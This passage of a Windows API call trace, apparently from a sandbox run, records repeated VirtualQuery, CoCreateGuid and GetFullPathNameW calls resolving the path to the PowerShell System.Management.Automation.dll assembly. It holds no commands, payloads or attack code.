	[0397.067] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0397.067] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0397.067] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0397.067] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0397.067] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0397.068] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0397.068] VirtualQuery (in: lpAddress=0x16bac0, lpBuffer=0x16c980, dwLength=0x30 | out: lpBuffer=0x16c980*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0397.068] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0397.068] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0397.068] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0397.068] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0397.069] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xbe3f78a5, Data2=0xda66, Data3=0x4cf5, Data4=([0]=0xb6, [1]=0x30, [2]=0xe4, [3]=0x64, [4]=0x46, [5]=0x3c, [6]=0xc3, [7]=0x40))) returned 0x0
	[0397.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.072] VirtualQuery (in: lpAddress=0x16b680, lpBuffer=0x16c540, dwLength=0x30 | out: lpBuffer=0x16c540*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.072] VirtualQuery (in: lpAddress=0x16b710, lpBuffer=0x16c5d0, dwLength=0x30 | out: lpBuffer=0x16c5d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.073] VirtualQuery (in: lpAddress=0x16b930, lpBuffer=0x16c7f0, dwLength=0x30 | out: lpBuffer=0x16c7f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.073] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x2d7dfe87, Data2=0xbf8b, Data3=0x4e0f, Data4=([0]=0x95, [1]=0xb9, [2]=0x24, [3]=0xa6, [4]=0x6d, [5]=0xc8, [6]=0x82, [7]=0x16))) returned 0x0
	[0397.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.074] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x757e705d, Data2=0x7ae2, Data3=0x4aeb, Data4=([0]=0xa3, [1]=0x1e, [2]=0x21, [3]=0xa0, [4]=0xcc, [5]=0x2f, [6]=0x1c, [7]=0x7e))) returned 0x0
	[0397.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.075] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x436568b3, Data2=0x7813, Data3=0x48f2, Data4=([0]=0xba, [1]=0x69, [2]=0x5e, [3]=0xe2, [4]=0x3c, [5]=0xb2, [6]=0x9a, [7]=0x47))) returned 0x0
	[0397.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
